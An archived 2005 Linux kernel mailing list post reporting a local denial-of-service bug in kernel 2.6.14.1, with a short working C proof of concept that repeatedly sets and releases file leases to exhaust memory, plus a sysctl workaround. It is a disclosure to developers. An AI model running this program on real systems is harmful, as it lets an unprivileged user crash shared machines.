local denial-of-service with file leases

From: Avi Kivity
Date: Thu Nov 10 2005 - 12:00:37 EST

Next message: Alexander Clouter: "[patch 1/1] cpufreq_conservative/ondemand: invert meaning of 'ignore nice'"
Previous message: Alexander Clouter: "[patch 1/1] cpufreq: documentation for 'ondemand' and 'conservative'"
Next in thread: Chris Wright: "Re: local denial-of-service with file leases"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

the following program will oom a the 2.6.14.1 kernel, running as an ordinary user:

#include <unistd.h>

#include <stdlib.h>

#include <linux/fcntl.h>

int main(int ac, char **av)

{

char *fname = av[0];

int fd = open(fname, O_RDONLY);

int r;

while (1) {

r = fcntl(fd, F_SETLEASE, F_RDLCK);

if (r == -1) {

perror("F_SETLEASE, F_RDLCK");

exit(1);

}

r = fcntl(fd, F_SETLEASE, F_UNLCK);

if (r == -1) {

perror("F_SETLEASE, F_UNLCK");

exit(1);

}

}

return 0;

}

it will suck all available memory into fasync_cache, causing an oom. a workaround is to set fs.leases-enable to 0.

this has already been reported to lkml[1] and fedora[2], with no effect.

[1] http://www.ussg.iu.edu/hypermail/linux/kernel/0510.2/1589.html
[2] https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=172691

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@xxxxxxxxxxxxxxx
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/

Next message: Alexander Clouter: "[patch 1/1] cpufreq_conservative/ondemand: invert meaning of 'ignore nice'"
Previous message: Alexander Clouter: "[patch 1/1] cpufreq: documentation for 'ondemand' and 'conservative'"
Next in thread: Chris Wright: "Re: local denial-of-service with file leases"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]